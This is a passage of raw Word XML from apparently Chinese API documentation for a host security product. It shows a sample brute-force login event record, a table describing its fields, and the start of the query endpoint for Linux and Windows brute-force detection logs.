        <w:t xml:space="preserve">            "agentId": "979f3c4d44b2e765",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "displayIp": "172.16.2.122",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "connectionIp": "172.16.2.122",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "externalIp": null,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "internalIp": "172.16.2.122",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroupId": 37,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "bizGroup": "test",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "remark": "安装了mysql或者DNSmasq",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostTagList": [],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "hostname": "tianxianhu",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "id": "tFU7aUo3o5w7GDPlJqQfMA==",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "serviceType": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">            "loginTime": 1523412532,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "clientIp": "106.75.67.64",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "block": -1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "serverName": "sshd"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    ],</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "total": 1</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D900940"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452"/>
        <w:gridCol w:w="896"/>
        <w:gridCol w:w="1545"/>
        <w:gridCol w:w="6189"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="045405E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9BF933F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7580BE29" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="670C28C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>建议长度</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="588513C3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="05D67CD8" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2672E4CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>id</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20C078AC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12E21D0D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(50)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="078148E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>记录ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="70168934" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1080236B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1EDB7526" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6429EBE6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(16)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="374BC021" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机ID，16位</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C5442C0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2B9A7A37" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>displayIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="604F603A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="602B7F83" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FC7BAC0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="0AD49B60" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="379181EA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>connectionIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6431B064" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6148E9FB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4545337A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>连接IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="69D4952D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1959735D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>externalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="17AB8730" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A6DEC18" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="56071C46" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>外网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3CDE9EAC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B6BC0D5" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>internalIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0FD16AEC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6FFF9468" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3AED4E38" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>内网IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6B1C3F6A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="437A0EA4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostname</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3C908178" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0EC3B4E9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="04FFF9BB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>主机名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="22DFAC2E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="35B9C676" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroupId</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="32FF6792" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B35298E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bigint(20)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1187D414" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组ID</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="037CD11A" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="79DD1AED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>bizGroup</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="325EFB79" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="00E210BA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(128)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7BA852C9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>业务组名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="43C5F919" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="666E76A2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>remark</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="36CA1ACA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="02728D7B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7FAA4FD7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>备注</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6F792E35" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1CF20695" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>hostTagList</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BF33515" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>List</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C482DE4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(1024)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="48152D57" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>标签</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="6492FA65" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="16EE8BA9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>loginTime</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="58709528" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7216F34C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>int(10)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7580ADA8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>攻击时间，时间戳，精确到秒</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="425856B5" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="759CD1F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>serviceType</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1C304322" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="028C24A1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5565ED95" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t xml:space="preserve">服务类型， Linux: 1:SSHD 2:VSFTPD Windows: 100:RDP </w:t>
            </w:r>
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>101:WINRM 102:SSH</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2888F13C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5203259C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:lastRenderedPageBreak/>
              <w:t>clientIp</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5DC6B2ED" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2ACB2576" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(15)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4E68E0E8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>攻击来源IP</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="722B07CB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="289B532E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>block</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="69D2D104" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>Integer</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="57A98754" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>tinyint(1)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1DB98B8B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>封停状态，见</w:t>
            </w:r>
            <w:hyperlink w:anchor="暴力破解封停状态">
              <w:r>
                <w:rPr>
                  <w:rStyle w:val="af6"/>
                </w:rPr>
                <w:t>封停状态</w:t>
              </w:r>
            </w:hyperlink>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="2C85DF97" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="77D6EEB4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>serverName</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0B906841" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>String</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3DFC38A4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>varchar(12)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1015B9CE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>服务类型名</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="26DF6FD6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="3"/>
      </w:pPr>
      <w:bookmarkStart w:id="138" w:name="查询记录"/>
      <w:bookmarkEnd w:id="137"/>
      <w:r>
        <w:t>查询记录</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64D21F42" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:t>该接口提供Linux/Windows暴力破解上报事件记录的数据查询。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C0621DB" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>调用接口：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="424DCA91" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>GET /external/api/detect/brutecrack/{linux,win}/log</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D60E7D4"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899"/>
        <w:gridCol w:w="777"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="3691"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="0895E38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9AA90F9" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2F887BF2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>类型</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2207C470" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>是否必填</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
